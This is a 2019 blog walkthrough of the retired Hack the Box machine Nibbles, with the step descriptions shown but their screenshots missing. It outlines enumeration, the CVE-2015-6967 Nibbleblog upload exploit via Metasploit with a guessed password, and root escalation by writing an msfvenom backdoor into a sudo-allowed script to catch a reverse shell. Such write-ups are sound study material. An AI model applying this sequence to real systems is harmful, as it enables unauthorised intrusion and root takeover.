Wednesday, March 13, 2019
Nibbles
NIBBLES
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Nibbles, what is a retired machine from the Hack the Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- Nibbles machines's IP is 10.10.10.75:
- Scanning with Nmap, there are just two open ports 22 and 80:
- Scanning deeper:
- Browsing the web page:
- Viewing the source it seems that there is a folder called /nibbleblog:
- Same result with curl:
- Connecting to /nibbleblog it results to be a blogging platform:
- Dirbusting /nibbleblog:
- Dirbusting for files with extensions .php:
- So we have found directories like /admin, /content, /languages and files like admin.php, feed.php, install.php, sitemap.php, update.php
- Let's examine some of the files and directories found with dirb.
- admin.php provides a login form:
- feed.php:
- install.php:
- update.php show that the version used is Nibbleblog 4.0.3 "Coffee":
- sitemap.php:
- /content:
- Going to /nibbleblog/content/private/users.xml we find the username admin:
- /languages:
3 - EXPLOITATION
- CVE-2015-6967 informs about the vulnerability found at Nibbleblog for versions before 4.0.5 (as seen before Nibbles uses versions 4.0.3):
- Metasploit provides a module to exploit this vulnerability:
- Using this module we get a Meterpreter session, passing the parameters username admin (discovered at users.xml) and password nibbles (just guessed):
- Getting a shell:
4 - CAPTURING THE 1st FLAG
- Reading user.txt:
5 - PRIVILEGE ESCALATION
- As expected, access to /root is denied:
- User nibbler has got sudoer privileges over the file monitor.sh:
- There is a file personal.zip at nibblers home folder:
- Unzipping personal.zip we locate monitor.sh (run with root privileges) inside directory /personal/stuff:
- Reading monitor.sh, it seems a script for managing different aspects of nibbles:
- So the privilege escalation plan will be to re-write monitor.sh with some type of backdoor, for instance this one created with Msfvenom:
- Echoing the backdoor to monitor.sh:
- Setting a Netcat listening session at Kali's port 1234:
- Running monitor.sh at nibbles:
- The consequence is a reverse root shell at Kali:
6 - CAPTURING THE 2nd FLAG
- Reading root.txt: